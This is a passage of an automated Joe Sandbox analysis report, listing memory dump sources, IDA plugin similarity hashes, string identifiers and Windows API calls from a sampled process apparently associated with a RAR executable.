• Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: *
• API String ID: 3215553584-163128923
• Opcode ID: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
• Instruction ID: c9d45c3d21dc9c0364cd24b756b47dec993dfe2775593bbe34a48ab8e545e627
• Opcode Fuzzy Hash: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
• Instruction Fuzzy Hash: 0171627290A69286F76CAF2C804147CBBA0FB85F58FD41137DE4A52299DF38D482C731
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentDirectoryW.KERNEL32(?,?,?,00000800,?,?,00000000,00007FF7D79E475B,?,00000000,?,?,00007FF7D79E4620,?,00000000,?), ref: 00007FF7D79F4633
Strings
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: CurrentDirectory
• String ID: UNC$\\?\
• API String ID: 1611563598-253988292
• Opcode ID: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
• Instruction ID: 007b7d8c59441c129a9617d55d9e0726dede01fd7fe762d40a70ceba5c958aca
• Opcode Fuzzy Hash: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
• Instruction Fuzzy Hash: 0C41D543A08A8341EA24BB69E4015BDE351AF857D8FC18533EE5D476EAEE2CF547C320
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: LoadString$fflushswprintf
• String ID: %d.%02d$[
• API String ID: 1946543793-195111373
• Opcode ID: f04d483f56175c8b40415d20487cbec804232b663c65daca34dce35784760712
• Instruction ID: 0b5f577b205eada7679c26e96a2c91f71b2281a4decada23e5cc0d04d3a9ce12
• Opcode Fuzzy Hash: f04d483f56175c8b40415d20487cbec804232b663c65daca34dce35784760712
• Instruction Fuzzy Hash: 1F31B312A0958341FB54FB29E459BBDA351AF85788FC8043BEA4D0B6D7DF2CE046C720
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: swprintf
• String ID: fixed%u.$fixed.
• API String ID: 233258989-2525383582
• Opcode ID: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
• Instruction ID: 7d03eb1738d39f2bc484e97e8ef119f785dd4dce05f713606af881596dc8ea0e
• Opcode Fuzzy Hash: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
• Instruction Fuzzy Hash: 21318423A0868292EB10BB65E4017EDE760EB85794FD04133EA5D176AADE3CD547CB20
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00007FF7D79F42CC: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7D79F430F
• GetVolumeInformationW.KERNEL32(?,00007FF7D79E0BED,?,?,00000000,?,?,00007FF7D79DF30F,00000000,00007FF7D79C6380,?,00007FF7D79C2EC8), ref: 00007FF7D79E337E
Strings
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: InformationVolumeswprintf
• String ID: FAT$FAT32
• API String ID: 989755765-1174603449
• Opcode ID: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
• Instruction ID: f27d91d25fe4c6118a33a3438e58f60d4cc437b46a8110fda37e438b328deeab
• Opcode Fuzzy Hash: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
• Instruction Fuzzy Hash: ED115432A1CA8241F760AB54E891AEEF394FFC4348FC05032EA4D83A95DF3CD5168B24
Uniqueness

Uniqueness Score: -1.00%